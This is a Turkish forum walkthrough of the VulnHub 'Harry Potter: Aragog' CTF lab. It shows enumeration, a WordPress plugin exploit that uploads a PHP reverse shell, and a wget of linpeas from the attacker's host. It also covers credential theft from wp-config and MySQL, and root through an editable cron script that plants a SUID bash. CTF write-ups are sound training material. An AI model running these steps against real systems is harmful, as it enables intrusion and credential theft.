VulnHub | HarryPotter Series CTF WriteUp

w1sd0m

w1sd0m

Katılımcı Üye
28 Mar 2020
699
626
/802.1x/
VulnHub | HarryPotter Series CTF WriteUp by w1sd0m

Harry Potter - Aragog
(Bölüm - 1)

p74a0ww.jpg


Selam dostlar, bu gün sizlere VulnHub'da yer alan ve "Harry Potter" seririsin ilk makinesi olan "Aragog" adlı CTF'in çözümünü anlatacağım.
Seri 3 makineden oluşmakta ve HarryPotter ile Lord Voldemort'un savaşını anlatmaktadır.
Kurgucu bu yolda HarryPotter'a yardım etmemizi istiyor.

Peki biz ne yapacağız?

Makineleri çözüp Lord Voldemort'a savaşı kazandıracak büyüyü söyleyeceğiz.
(Voldemort adamdır)
lr0mn6b.jpg

Şimdiden teşekkür ederim.

Öncelikle zafiyetli makinemizi Oracle VM VirtualBox'ımıza indirdik. (VMware'de sıkıntı çıkarabiliyormuş,makine sahibi yazmış)
gm2z5fb.jpg


Makineyi ayağa kaldırdık. IP adresini vermiş sağolsun ancak vermese de "netdiscover" gibi araçlarla bulurduk. Bizden 3 makineyi de çözüp Voldemort'u devirmemizi istiyor. (Sen öyle san!)
Hemen bir nmap taramasıyla işe başlayalım.
2vg1von.jpg


Port 22 ve 80'in açık olduğunu gördük. Böyle senaryolarda genelde web sayfasından yürünür. Gidelim bakalım bu cadılar ne işler karıştırıyor.
dvjq7ao.png


Siteye birkaç ergenin Lord Voldemort'a kafa tuttuğu bir banner koyulmuş. Burası boş. O halde dizin taraması yapalım bakalım neler bulacağız.
gobuster dir -u http://10.0.2.21 -w /usr/share/wordlist/dirb/common.txt
"/blog/" diye bir dizin keşfediyoruz ve oraya gidiyoruz.
99yyzi6.jpg
Bizi bozuk bir "wordpress" sayfası karşıladı. Wordpress sitelerde karşılaştığımız bir durum.

Düzeltmek için adresi hosta kaydedelim.
echo '10.0.2.21 wordpress.aragog.hogwarts' >> /etc/hosts
3kegtfi.jpg
Burada sağa sola biraz baktım, kutuları felan kurcaladım. Fakat istediğimi bulamadım.

E dedim madem wordpress sitedeyiz bi Wpscann çalıştıralım. Buraya kadar elle tutulur birşeyler bulamadığım için wpscann'de agresif bir tarama yapacağım. Bunun için API key kullandım.
(Hesap oluşturunca ücretsiz veriyor)
wpscan --api-token="aldığın api" --url=http://10.0.2.20/blog -e p --plugins-detection aggressive
e2qteje.jpg
Bak burada içeri giriş biletimi buldum gibi. Uzaktan kod çalıştırmamıza yarayan bir zafiet bulunmuş.

Hogwarts'ın kapılarına dayanacağım az kaldı hissediyorum.
References kısmında görmüş olduğumuz ilk siteyi ziyaret ettiğimde bana bir pyton scripti indirtti. Bu script bulunduğu dosyada "payload.php" adında bir dosya varsa onu siteye yükleyebiliyormuş.
Hay hay hemen hallederiz. Bir tane php reverse shell koydum inirdiğim python scriptinin yanına ve scripti çalıştırdım.
tjx2mt7.png
İşlem başarılı dedi ve bize payload'ı yüklediği url'i verdi.

Bize kalan ise Netcat ile dinleme açıp, verilen url'e giderek bağlantıyı yakalamak.
3o6fgcv.png
Ve artık Hogwarts'dayız. Yalnız bizim farkımıza varabilirler. Bir Türk'ü gevurların içinde seçebilirsin.
Bizim onlardan birinin kılığına bürünmemiz gerek.
Önce aldığımız shell'i bi düzeltelim.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Bu yeterli olacaktır. Bozulursa hallederiz.

Biraz etrafta gezindim. Ne var ne yok diye baktım. Sonra "/tmp" klasörüne geçerek "linpeas.sh" dosyasını çektim ki nerede ne var biraz bilgim olsun boş boş dolanmayayım.
Kod: 
cd /tmp
wget http://10.0.2.21:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Bana bi "/usr/share/wordpress/wp-config.php" dosyası gösterdi. Bi gidip bakayım dedim.
b1933rk.png
Burada bir takım işler dönmüş. Harry Potter'ın işi olabilir bu. "/etc/wordpress/" dizinine gidiyorum.

Burada beni değerli bilgiler karşılıyor. Hadi gelin bakalım.
f7zszqm.png
Database kullanıcı adı ve parolayı bulduk.

Dumbledore'un kredi kartı bilgilerini içermesini umut ederek devam ediyorum.
mysql -u "root" -p
Parolayı da girdikten sonra database bilgilerini çekebiliriz.
tpq08do.png
Ah Hagrid üzümlü kekim. "hagrid98" adlı kullanıcının ve şifresini bulduk.

Bu şifreyi kırıp hagrid'in kılığına bürünmemiz gerek. Etrafta daha fazla dikkat çekmeden daha derinlere inmeliyiz.



Derine...


fak7f28.png


3dq03s0.jpg


Ulan Hagrid ne kalın kafalı adamsın. Böyle parola mı olur?

Burada ister "su hagrid98" ile kullanıcı değiştirin, ister "ssh [email protected]" ile ssh bağlantısı yapın. Farketmez.

Şimdi "/tmp" klasörüne gidip "linpeas.sh" dosyasını tekrar çalıştıracağım. Bakalım Dumbledore'un kılığa bürünebilmenin(root) yolları varmı.
jl9ucpi.png
Burada "/opt/.backup.sh" dosyası ayna gibi parlıyor. Gidip ne işe yaradığına bakalım.
6v686cg.png
Bu dosyanın arka planda sürekli çalıştırıldığına yemin edebilirim ancak kanıtlayamam.

Aslında kanıtlayabilirim.
Halen "/tmp" klasöründeyken pspy64 aracını buraya çekip, Hogwarts'ın arka planında neler dönüyor bakmak istiyorum.
Kod: 
chmod +x pspy64
./pspy64
of8womv.png
Tam tahmin ettiğim gibi, bu dosya sayesinde Dumbledore olacağız. Sonra herkesi okuldan atacağız.

Dosyanın içeriğine bakmıştık. Şimdi editleyelim.
je89ddl.png
Klasik bir bash shelli alıp Müdür olmak istiyorum.

Bakalım başarabilecek miyim?

NOT: Arkadaşlar çok basic ilerlemiyorum, crontab mantığı, kaç saniyede dakikada bir dosyanın otomatik çalıştırıldığı felan. Kusura bakmayın. Amacım sizi çok da sıkmadan CTF'i sevdirmek.

q5ol65q.png
Dosyamı kaydettim ve "/tmp" klasörüne baktım.Dosya daha çalıştırılmamış.Bekleyeceğim

kvlsh5i.png
Birkaç saniye sonra tekrar klasöre baktığımda istediğim dosyanın oluşturulduğunu gördüm. /tmp/bash -p Komutu ile okulda müdür oldum.

Şimdi Dumbledore düşünsün.

sqxa740.png





*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

Serinin ilk bölümünü böylece bitirmiş olduk.
Hogwarts'a sızmayı başardık, Lord Voldemort'un bize verdiği görevde emin adımlarla ilerliyoruz.
Bakalım ikinci bölümde başımıza neler gelecek.
(Beğendiyseniz motivasyon için değerli yorumlarınızı belirtebilirsiniz.)

"Sürçü lisan eylediysek af ola"

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*



vjtipa2.jpg
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.